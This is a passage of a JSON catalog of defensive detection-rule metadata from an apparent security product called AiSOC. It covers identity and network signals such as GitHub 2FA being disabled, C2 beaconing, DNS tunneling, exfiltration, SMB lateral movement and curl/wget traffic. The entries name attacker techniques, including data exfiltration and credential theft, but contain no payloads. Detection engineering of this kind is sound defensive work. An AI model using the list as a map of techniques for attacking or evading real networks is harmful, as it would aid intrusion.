"detection", "name": "Slack Channel Shared Externally", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Slack Channel Shared Externally'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1567" ], "log_source": "slack", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-slack-channel-shared-external.yaml" }, { "id": "det-identity-153", "type": "detection", "name": "GitHub Org 2FA Requirement Disabled", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'GitHub Org 2FA Requirement Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "github", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-github-org-2fa-disabled.yaml" }, { "id": "det-identity-154", "type": "detection", "name": "GitHub Classic PAT Created With repo+workflow+admin:org", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'GitHub Classic PAT Created With repo+workflow+admin:org'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "github", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-github-pat-classic-created-with-broad-scopes.yaml" }, { "id": "det-identity-155", "type": "detection", "name": "GitHub Org Bulk Member Removed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'GitHub Org Bulk Member Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1531" ], "log_source": "github", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-github-org-collaborator-removed-bulk.yaml" }, { "id": "det-identity-156", "type": "detection", "name": "GitHub Deploy Key Added Across Many Repos", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'GitHub Deploy Key Added Across Many Repos'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "github", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-github-deploy-key-added-org-wide.yaml" }, { "id": "det-identity-157", "type": "detection", "name": "Zoom Account Policy Disables Meeting Passcode", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Zoom Account Policy Disables Meeting Passcode'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "zoom", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-zoom-passcode-disabled-meeting-policy.yaml" }, { "id": "det-identity-158", "type": "detection", "name": "Atlassian Org 2FA Requirement Removed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Atlassian Org 2FA Requirement Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "atlassian", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-atlassian-org-required-2fa-off.yaml" }, { "id": "det-identity-159", "type": "detection", "name": "Atlassian Org API Token Created", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Atlassian Org API Token Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "atlassian", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-atlassian-api-token-created.yaml" }, { "id": "det-identity-160", "type": "detection", "name": "MDM Policy Removed Requiring Device Compliance", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'MDM Policy Removed Requiring Device Compliance'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "mdm", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-jamf-mdm-policy-mfa-removed.yaml" }, { "id": "det-network-001", "type": "detection", "name": "C2 Beacon Pattern (Periodic High-Frequency)", "description": "Detects highly periodic outbound network connections to a single destination, characteristic of command-and-control (C2) beaconing from implants. Combines both connection count and interval consistency to reduce false positives from telemetry agents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/c2-beacon-high-frequency.yaml" }, { "id": "det-network-002", "type": "detection", "name": "DNS Tunneling / Exfiltration (High Length Subdomains)", "description": "Detects DNS tunnelling activity characterised by abnormally long subdomain labels and high query volume to a single parent domain. Common technique for covert data exfiltration that bypasses egress filtering on standard ports.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1048.003" ], "log_source": "dns", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/dns-data-exfiltration.yaml" }, { "id": "det-network-003", "type": "detection", "name": "Internal Network Port Scan", "description": "Detects horizontal and vertical port scanning activity originating from inside the network. Often the first sign of an attacker performing reconnaissance after gaining initial foothold.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1046" ], "log_source": "ndr", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/port-scan-internal.yaml" }, { "id": "det-network-004", "type": "detection", "name": "SSH Brute-Force From Internet", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SSH Brute-Force From Internet'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1110.001" ], "log_source": "linux", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ssh-failed-from-internet.yaml" }, { "id": "det-network-005", "type": "detection", "name": "SMB Lateral Movement (Many ADMIN$ Connections)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Lateral Movement (Many ADMIN$ Connections)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1021.002" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/smb-lateral-movement.yaml" }, { "id": "det-network-006", "type": "detection", "name": "RDP From Internet to Internal Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'RDP From Internet to Internal Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1133" ], "log_source": "ndr", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/rdp-from-internet.yaml" }, { "id": "det-network-007", "type": "detection", "name": "Outbound Connection to Known Tor Exit", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound Connection to Known Tor Exit'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1090.003" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/tor-traffic.yaml" }, { "id": "det-network-008", "type": "detection", "name": "Outbound HTTP(S) to Newly Registered Domain", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound HTTP(S) to Newly Registered Domain'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "proxy", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/newly-registered-domain-traffic.yaml" }, { "id": "det-network-009", "type": "detection", "name": "DNS Fast-Flux (Many Distinct A-Records / Short TTL)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Fast-Flux (Many Distinct A-Records / Short TTL)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1568.001" ], "log_source": "dns", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/dns-fast-flux.yaml" }, { "id": "det-network-010", "type": "detection", "name": "SMB Authentication Without Signing", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Authentication Without Signing'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1557.001" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/smb-signing-disabled-auth.yaml" }, { "id": "det-network-011", "type": "detection", "name": "Rogue DHCP Server Detected on LAN", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Rogue DHCP Server Detected on LAN'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1557" ], "log_source": "ndr", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/dhcp-rogue-server.yaml" }, { "id": "det-network-012", "type": "detection", "name": "ICMP Tunneling Pattern (Large Payloads)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'ICMP Tunneling Pattern (Large Payloads)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1095" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/icmp-tunnel.yaml" }, { "id": "det-network-013", "type": "detection", "name": "Outbound TLS to Server with Self-Signed Cert (Non-Allowed)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound TLS to Server with Self-Signed Cert (Non-Allowed)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/tls-self-signed-cert-conn.yaml" }, { "id": "det-network-014", "type": "detection", "name": "TLS JA3 Hash in Threat-Intel Match", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'TLS JA3 Hash in Threat-Intel Match'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/tls-ja3-anomaly.yaml" }, { "id": "det-network-015", "type": "detection", "name": "Outbound Traffic to Rare/Suspicious ASN", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound Traffic to Rare/Suspicious ASN'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/egress-to-rare-asn.yaml" }, { "id": "det-network-016", "type": "detection", "name": "SMB Null Session Attempt", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Null Session Attempt'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1135" ], "log_source": "windows", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/smb-null-session.yaml" }, { "id": "det-network-017", "type": "detection", "name": "LDAP Bind from Workstation to Domain Controller (Excessive)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'LDAP Bind from Workstation to Domain Controller (Excessive)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1087.002" ], "log_source": "windows", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ldap-bind-anomaly.yaml" }, { "id": "det-network-018", "type": "detection", "name": "SNMP Public Community String Probe From Internet", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SNMP Public Community String Probe From Internet'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1190" ], "log_source": "ndr", "playbook": "tpl-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/snmp-public-community-internet.yaml" }, { "id": "det-network-019", "type": "detection", "name": "SYN Flood Pattern Against Public Endpoint", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SYN Flood Pattern Against Public Endpoint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1498.001" ], "log_source": "ndr", "playbook": "tpl-ddos", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ddos-syn-flood.yaml" }, { "id": "det-network-020", "type": "detection", "name": "Outbound Connection to Threat-Intel-Blocked IP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound Connection to Threat-Intel-Blocked IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/egress-to-blocklisted-ip.yaml" }, { "id": "det-network-021", "type": "detection", "name": "Internal Host Spamming SMTP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Internal Host Spamming SMTP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1566" ], "log_source": "ndr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/internal-host-spamming-mail.yaml" }, { "id": "det-network-022", "type": "detection", "name": "RDP Logon Session With Concurrent Active Console Session", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'RDP Logon Session With Concurrent Active Console Session'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1021.001" ], "log_source": "windows", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/rdp-screen-takeover.yaml" }, { "id": "det-network-023", "type": "detection", "name": "Outbound IPv6 Teredo / 6to4 Tunneling Traffic", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound IPv6 Teredo / 6to4 Tunneling Traffic'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "ndr", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ipv6-tunnel-outbound.yaml" }, { "id": "det-network-024", "type": "detection", "name": "DNS-over-HTTPS to Non-Approved Resolver", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS-over-HTTPS to Non-Approved Resolver'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.004" ], "log_source": "proxy", "playbook": "tpl-c2", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/dns-over-https-rare.yaml" }, { "id": "det-network-025", "type": "detection", "name": "Outbound FTP Bulk Transfer From Non-Allowlisted Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound FTP Bulk Transfer From Non-Allowlisted Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1048.003" ], "log_source": "ndr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ftp-outbound-anomaly.yaml" }, { "id": "det-network-026", "type": "detection", "name": "Outbound Clear-Text Protocol Carrying Credentials", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound Clear-Text Protocol Carrying Credentials'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1040" ], "log_source": "ndr", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/outbound-clear-text-protocol.yaml" }, { "id": "det-network-027", "type": "detection", "name": "NTP Amplification Reflector Attack (Inbound monlist)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'NTP Amplification Reflector Attack (Inbound monlist)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1498.002" ], "log_source": "ndr", "playbook": "tpl-ddos", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ntp-amplification.yaml" }, { "id": "det-network-028", "type": "detection", "name": "Peer-to-Peer Protocol on Corporate Network", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Peer-to-Peer Protocol on Corporate Network'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "network", "mitre_techniques": [ "T1071" ], "log_source": "ndr", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/p2p-protocol-on-corp-net.yaml" }, { "id": "det-network-029", "type": "detection", "name": "Kerberos Encryption Downgrade to RC4", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Kerberos Encryption Downgrade to RC4'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1558.003" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/kerberos-encryption-downgrade.yaml" }, { "id": "det-network-030", "type": "detection", "name": "WMI Remote Process Creation From Workstation", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'WMI Remote Process Creation From Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1047", "T1021.006" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/wmi-remote-execution.yaml" }, { "id": "det-network-031", "type": "detection", "name": "DNS Query For Newly Registered Domain (NRD)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Query For Newly Registered Domain (NRD)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.004" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-newly-registered-domain.yaml" }, { "id": "det-network-032", "type": "detection", "name": "DNS Query For Homoglyph Of Internal Brand", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Query For Homoglyph Of Internal Brand'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1583.001" ], "log_source": "dns", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-idn-homoglyph.yaml" }, { "id": "det-network-033", "type": "detection", "name": "High Volume Of NXDOMAIN Responses From Single Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'High Volume Of NXDOMAIN Responses From Single Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1568.002" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-nxdomain-spike.yaml" }, { "id": "det-network-034", "type": "detection", "name": "DNS Query Type ANY Volume From Single Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Query Type ANY Volume From Single Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1018" ], "log_source": "dns", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-any-query-spike.yaml" }, { "id": "det-network-035", "type": "detection", "name": "DNS Query With High-Entropy Subdomain (DGA Indicator)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Query With High-Entropy Subdomain (DGA Indicator)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1568.002" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-dga-shannon.yaml" }, { "id": "det-network-036", "type": "detection", "name": "Large DNS TXT Response (Possible C2)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Large DNS TXT Response (Possible C2)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.004" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-large-txt-response.yaml" }, { "id": "det-network-037", "type": "detection", "name": "DNS Tunnel Indicator: Long Hex Subdomain Sequence", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Tunnel Indicator: Long Hex Subdomain Sequence'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.004" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-tunnel-pattern-len.yaml" }, { "id": "det-network-038", "type": "detection", "name": "DNS-Over-HTTPS Egress To Non-Sanctioned Resolver", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS-Over-HTTPS Egress To Non-Sanctioned Resolver'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-doh-non-resolver.yaml" }, { "id": "det-network-039", "type": "detection", "name": "DNS-Over-TLS Egress To Public IP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS-Over-TLS Egress To Public IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-dot-non-resolver.yaml" }, { "id": "det-network-040", "type": "detection", "name": "DNS Query For .onion Address", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Query For .onion Address'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1090.003" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-tor-onion.yaml" }, { "id": "det-network-041", "type": "detection", "name": "DNS Fast-Flux Pattern (Many A Records, Short TTL)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Fast-Flux Pattern (Many A Records, Short TTL)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1568.001" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-fast-flux.yaml" }, { "id": "det-network-042", "type": "detection", "name": "DNS Rebinding Indicator (Public\u2192RFC1918 In Same TTL Window)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Rebinding Indicator (Public\u2192RFC1918 In Same TTL Window)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1090" ], "log_source": "dns", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-rebinding.yaml" }, { "id": "det-network-043", "type": "detection", "name": "HTTP CONNECT Method Toward Public IP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'HTTP CONNECT Method Toward Public IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1090" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-connect-public-ip.yaml" }, { "id": "det-network-044", "type": "detection", "name": "HTTP User-Agent Matches PowerShell Default", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'HTTP User-Agent Matches PowerShell Default'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-userag-powershell.yaml" }, { "id": "det-network-045", "type": "detection", "name": "curl/wget User-Agent From Workstation Subnet", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'curl/wget User-Agent From Workstation Subnet'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-userag-curl-internal.yaml" }, { "id": "det-network-046", "type": "detection", "name": "HTTP Host Header Is IP Literal", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'HTTP Host Header Is IP Literal'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-host-header-ip.yaml" }, { "id": "det-network-047", "type": "detection", "name": "TLS Client Offered TLS 1.0 Or 1.1", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'TLS Client Offered TLS 1.0 Or 1.1'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "proxy", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tls-old-client-version.yaml" }, { "id": "det-network-048", "type": "detection", "name": "HTTPS Connection To IP Without SNI", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'HTTPS Connection To IP Without SNI'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tls-no-sni.yaml" }, { "id": "det-network-049", "type": "detection", "name": "Self-Signed Certificate Presented On Public IP", "description": "AiSOC v1 curated detection. 